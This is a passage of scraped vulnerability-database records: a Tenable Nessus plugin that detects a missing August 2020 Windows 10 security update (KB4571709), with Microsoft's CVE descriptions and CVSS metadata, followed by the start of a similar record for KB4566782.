"CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", "CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", "CVE-2020-1548", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1569", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1578", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571709.NASL", "href": "https://www.tenable.com/plugins/nessus/139490", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139490);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1464\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1524\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n \"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1548\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1551\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1569\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1578\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4571709\");\n script_xref(name:\"MSFT\", value:\"MS20-4571709\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4571709: Windows 10 Version 1803 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571709.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Shell Components improperly handle\n memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571709/windows-10-update-kb4571709\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3c857b4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571709.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571709'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571709])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:32", "description": "The remote Windows host is missing security update 4566782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists on ARM implementations that use speculative execution in control flow via a side-channel analysis, aka &quot ;straight-line speculation." (CVE-2020-1459)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when 